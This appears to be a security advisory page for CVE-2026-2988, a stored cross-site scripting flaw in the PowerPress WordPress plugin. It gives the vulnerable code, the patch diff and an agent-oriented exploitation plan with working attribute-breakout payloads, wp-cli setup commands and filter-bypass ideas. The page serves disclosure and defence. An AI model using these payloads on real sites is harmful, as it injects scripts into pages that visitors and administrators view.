CVE-2026-2988

Blubrry PowerPress <= 11.15.15 - Authenticated (Contributor+) Stored Cross-Site Scripting via powerpress and podcast Shortcodes

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
11.15.16
Patched in
1d
Time to patch

Description

The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions up to, and including, 11.15.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=11.15.15
PublishedApril 7, 2026
Last updatedApril 8, 2026
Affected pluginpowerpress

What Changed in the Fix

Changes introduced in v11.15.16

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-2988 ## 1. Vulnerability Summary The **Blubrry PowerPress Podcasting** plugin (versions <= 11.15.15) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[powerpress]` and `[podcast]` shortcodes. The vulnerability exists because the shortcode handl…

Show full research plan

Exploitation Research Plan - CVE-2026-2988

1. Vulnerability Summary

The Blubrry PowerPress Podcasting plugin (versions <= 11.15.15) is vulnerable to Stored Cross-Site Scripting (XSS) via the [powerpress] and [podcast] shortcodes. The vulnerability exists because the shortcode handler, powerpress_shortcode_handler, accepts user-supplied attributes (such as image, width, and height) and passes them into HTML rendering filters without adequate sanitization or output escaping. While the plugin attempts to block javascript: protocols, it fails to prevent attribute breakouts (e.g., using " to inject event handlers like onmouseover).

2. Attack Vector Analysis

  • Shortcodes: [powerpress], [podcast], and [display_podcast].
  • Vulnerable Parameters: url, image, width, height.
  • Authentication Level: Contributor or higher (any role with edit_posts capability).
  • Endpoint: wp-admin/post.php (to save the post) and the frontend post URL (to trigger the XSS).
  • Preconditions: The plugin must be active. The process_podpress setting may need to be enabled for the display_podcast shortcode, but powerpress and podcast are typically available by default.

3. Code Flow

  1. Entry Point: A Contributor saves a post containing a shortcode:
    [powerpress url="http://example.com/audio.mp3" width='1" onmouseover="alert(1)"'].
  2. Registration: powerpressplayer_init() (in powerpress-player.php) registers the shortcode handlers via add_shortcode.
  3. Processing: When the post is viewed, WordPress calls powerpress_shortcode_handler($attributes, $content) (in powerpress-player.php).
  4. Weak Sanitization: The handler runs a filter that only checks for the javascript: prefix:
    $attributes = array_filter($attributes, function ($var) {
        $var_without_whitespace = preg_replace("/\s+/", "", $var);
        if (strpos($var_without_whitespace, 'javascript:') === 0) {
            return ''; // Only blocks javascript: protocol
        } else {
            return $var;
        }
    });
    
  5. Sink: The attributes are extracted and passed to the powerpress_player filter:
    $return = apply_filters('powerpress_player', '', ..., array('image'=>$image, 'type'=>$content_type,'width'=>$width, 'height'=>$height) );
    
  6. Rendering: The filter handlers (e.g., powerpressplayer_mediaobjects_video or default MediaElement.js templates) take these raw strings and echo them into HTML attributes (e.g., <video width="..." ...>). Because width was not cast to an integer or escaped with esc_attr(), the injected " breaks out of the attribute.

4. Nonce Acquisition Strategy

Creating or editing a post via the web UI requires a WordPress core nonce (_wpnonce). Since this is a Stored XSS vulnerability initiated by an authenticated user, the agent should use the following strategy:

  1. Role Context: Authenticate as a Contributor.
  2. Action: Navigate to the "Add New Post" page.
  3. Nonce Extraction:
    • Use browser_navigate to wp-admin/post-new.php.
    • Use browser_eval to extract the core nonce: browser_eval("document.querySelector('#_wpnonce').value").
  4. Alternative (Recommended for PoC): Use wp-cli to bypass the need for nonce extraction during the injection phase, then use the http_request tool to verify the execution phase as a Guest or Admin.

5. Exploitation Strategy

Step 1: Inject Payload

Use wp-cli to create a post with a malicious shortcode. This simulates a Contributor saving a post.

Payload 1 (Attribute Breakout in width):

[powerpress url="https://content.blubrry.com/blubrrypreview/transcript_test_episode.mp3" width='1" onmouseover="alert(`XSS_WIDTH`)" style="display:block;width:1000px;height:1000px;border:1px solid red;"']

Payload 2 (Attribute Breakout in image):

[podcast url="https://content.blubrry.com/blubrrypreview/transcript_test_episode.mp3" image='https://example.com/fake.jpg" onerror="alert(`XSS_IMAGE`)"']

Step 2: Trigger XSS

Access the newly created post URL using the http_request tool.

Request:

  • Method: GET
  • URL: http://localhost:8080/?p=[POST_ID]
  • Headers: User-Agent of a victim (e.g., Admin) or Guest.

Step 3: Identify Execution

Verify that the response contains the unescaped payload.

  • Expected string in HTML: width="1" onmouseover="alert(XSS_WIDTH)"

6. Test Data Setup

  1. Create User:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  2. Create Post (Payload):
    wp post create --post_type=post --post_status=publish --post_title="Podcast Episode" --post_author=$(wp user get attacker --field=ID) --post_content='[powerpress url="https://content.blubrry.com/blubrrypreview/transcript_test_episode.mp3" width="1\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;\""]'

7. Expected Results

  • The HTTP response from the post URL will contain the injected JavaScript event handler.
  • The width attribute will be rendered as width="1".
  • The onmouseover attribute will be present: onmouseover="alert(document.domain)".
  • Because of the injected style attribute, the entire page becomes a "hover-trap," triggering the alert immediately upon mouse movement.

8. Verification Steps

  1. Verify Storage:
    wp post get [POST_ID] --field=post_content
  2. Verify Output (CLI):
    Execute a request and grep for the breakout:
    curl -s http://localhost:8080/?p=[POST_ID] | grep "onmouseover=\"alert"
  3. Verify Output (Agent):
    Use http_request and check if body contains onmouseover="alert(document.domain)".

9. Alternative Approaches

If the width attribute is stripped or cast to an integer in a specific environment:

  1. The image attribute: Use [powerpress image='x" onerror="alert(1)"']. PowerPress often renders the image as a poster attribute in a <video> tag or a src in an <img> tag.
  2. The url attribute: Although checked for javascript:, the check is weak. Try:
    [powerpress url=" javascript:alert(1)"] (The preg_replace might fail depending on character encoding or specific whitespace bypasses like %0a).
  3. The height attribute: Identical breakout logic to width.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Blubrry PowerPress Podcasting plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via shortcode attributes such as 'width', 'height', and 'image' in versions up to 11.15.15. Authenticated attackers with contributor-level permissions or higher can inject arbitrary scripts into posts that execute in the context of any user viewing the page.

Vulnerable Code

// powerpress-player.php:134
if (is_array($attributes)) {
    $attributes = array_filter($attributes, function ($var) {
        $var_without_whitespace = preg_replace("/\s+/", "", $var);
        if (strpos($var_without_whitespace, 'javascript:') === 0) {
            return '';
        } else {
            return $var;
        }
    });
}

---

// powerpress-player.php:831
// For thumbnail image, use the podcast artwork
if( !empty($EpisodeData['image']) )
{
    $addhtml .= '<meta itemprop="thumbnailURL" content="'.$EpisodeData['image'] .'" />'.PHP_EOL_WEB;
}

if( !empty($EpisodeData['size']) )
{
    $addhtml .= '<meta itemprop="contentSize" content="'.$EpisodeData['size'] .'" />'.PHP_EOL_WEB;
}

// <meta itemprop="videoQuality" content="HD"/>
if( !empty($EpisodeData['height']) && is_numeric($EpisodeData['height']) )
{
    $addhtml .= '<meta itemprop="height" content="'.$EpisodeData['height'] .'" />'.PHP_EOL_WEB;
}

if( !empty($EpisodeData['width']) && is_numeric($EpisodeData['width']) )
{
    $addhtml .= '<meta itemprop="width" content="'.$EpisodeData['width'] .'" />'.PHP_EOL_WEB;
}

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/powerpress/11.15.15/powerpress-player.php	2026-02-12 15:03:12.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/powerpress/11.15.16/powerpress-player.php	2026-03-03 15:05:34.000000000 +0000
@@ -134,11 +134,14 @@
 			'channel' => '',
 			'slug' => '',
 			'image' => '',
-			'width' => '',
+		            'width' => '',
 			'height' => '',
             'sample' => ''
 		), $attributes ) );
-		
+
+    $url = esc_url_raw($url);
+    $image = esc_url_raw($image);
+
 	if( empty($channel) && !empty($feed) ) // Feed for backward compat.
 		$channel = $feed;
 	if( !empty($slug) ) // Foward compatibility
@@ -147,8 +150,8 @@
 	if( !$url && $content )
 	{
 		$content_url = trim($content);
-		if( @parse_url($content_url) )
-			$url = $content_url;
+		if( filter_var($content_url, FILTER_VALIDATE_URL) )
+			$url = esc_url_raw($content_url);
 	}
 	
 	if( $url && !$sample )
@@ -176,7 +179,7 @@
 		if( !empty($width) )
 			$EpisodeData['width'] = $width;
 		if( !empty($height) )
-			$EpisodeData['height'] = $height;
+		            $EpisodeData['height'] = $height;
 		if (!empty($url)) {
             $EpisodeData['url'] = $url;
         }
@@ -332,29 +335,25 @@
 		return '';
 	}
 	
-	$width = 0;
-	$height = 0;
-	if( !empty($EpisodeData['width']) && is_numeric($EpisodeData['width']) )
-		$width = $EpisodeData['width'];
-	if( !empty($EpisodeData['height']) && is_numeric($EpisodeData['height']) )
-		$height = $EpisodeData['height'];
+	    $width = absint($EpisodeData['width'] ?? 0);
+	    $height = absint($EpisodeData['height'] ?? 0);
 	
 	// More efficient, only pull the general settings if necessary
 	if( $height == 0 || $width == 0 )
 	{
-		$GeneralSettings = get_option('powerpress_general');
+		$GeneralSettings = get_option('powerpress_general', []);
 		if( $width == 0 )
 		{
 			$width = 400;
 			if( !empty($GeneralSettings['player_width']) )
-				$width = $GeneralSettings['player_width'];
+				$width = absint($GeneralSettings['player_width']);
 		}
 		
 		if( $height == 0 )
 		{
 			$height = 400;
 			if( !empty($GeneralSettings['player_height']) )
-				$height = $GeneralSettings['player_height'];
+				$height = absint($GeneralSettings['player_height']);
 		}
 		
 		$extension = powerpressplayer_get_extension($EpisodeData['url']);
@@ -389,8 +388,8 @@
     $iframeTitle = esc_attr( __('Blubrry Podcast Player', 'powerpress') );
 	$embed .= '<iframe';
 	//$embed .= ' class="powerpress-player-embed"';
-	$embed .= ' width="'. htmlspecialchars($width) .'"';
-	$embed .= ' height="'. htmlspecialchars($height) .'"';
+	$embed .= ' width="'. absint($width) .'"';
+	$embed .= ' height="'. absint($height) .'"';
 	$embed .= ' src="'. htmlspecialchars($url) .'"';
     $embed .= ' title="'. htmlspecialchars($iframeTitle) .'"';
 	$embed .= ' frameborder="0" scrolling="no"';
@@ -821,12 +820,12 @@
             $addhtml .= '<meta itemprop="description" content="' . htmlspecialchars($subtitle) . '" />' . PHP_EOL_WEB;
         }
 	}
-	$addhtml .= '<meta itemprop="contentUrl" content="'. htmlspecialchars($media_url) .'" />'.PHP_EOL_WEB;
+	$addhtml .= '<meta itemprop="contentUrl" content="'. esc_url($media_url) .'" />'.PHP_EOL_WEB;
 	
 	// For thumbnail image, use the podcast artwork
 	if( !empty($EpisodeData['image']) )
 	{
-		$addhtml .= '<meta itemprop="thumbnailURL" content="'.$EpisodeData['image'] .'" />'.PHP_EOL_WEB;
+		$addhtml .= '<meta itemprop="thumbnailURL" content="'. esc_url($EpisodeData['image']) .'" />'.PHP_EOL_WEB;
 	}
 	
 	if( !empty($EpisodeData['size']) )
@@ -837,12 +836,12 @@
 	// <meta itemprop="videoQuality" content="HD"/>
 	if( !empty($EpisodeData['height']) && is_numeric($EpisodeData['height']) )
 	{
-		$addhtml .= '<meta itemprop="height" content="'.$EpisodeData['height'] .'" />'.PHP_EOL_WEB;
+		$addhtml .= '<meta itemprop="height" content="'. absint($EpisodeData['height']) .'" />'.PHP_EOL_WEB;
 	}
 	
 	if( !empty($EpisodeData['width']) && is_numeric($EpisodeData['width']) )
 	{
-		$addhtml .= '<meta itemprop="width" content="'.$EpisodeData['width'] .'" />'.PHP_EOL_WEB;
+		$addhtml .= '<meta itemprop="width" content="'. absint($EpisodeData['width']) .'" />'.PHP_EOL_WEB;
 	}

Exploit Outline

The exploit requires an attacker with 'edit_posts' capability (Contributor or higher). 1. The attacker creates or edits a post and inserts a PowerPress shortcode, such as `[powerpress]`, `[podcast]`, or `[display_podcast]`. 2. The attacker includes a malicious payload in one of the shortcode's attributes (e.g., `width`, `height`, or `image`) that utilizes double quotes to break out of the HTML attribute and inject an event handler. 3. Example payload: `[powerpress width='1" onmouseover="alert(document.domain)" style="display:block;width:1000px;height:1000px;"']`. 4. When the post is saved, the plugin stores this malicious string. 5. When an administrator or guest views the post, the plugin renders the attribute directly into the HTML without proper escaping, causing the browser to execute the injected JavaScript (e.g., when the mouse moves over the player area).

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.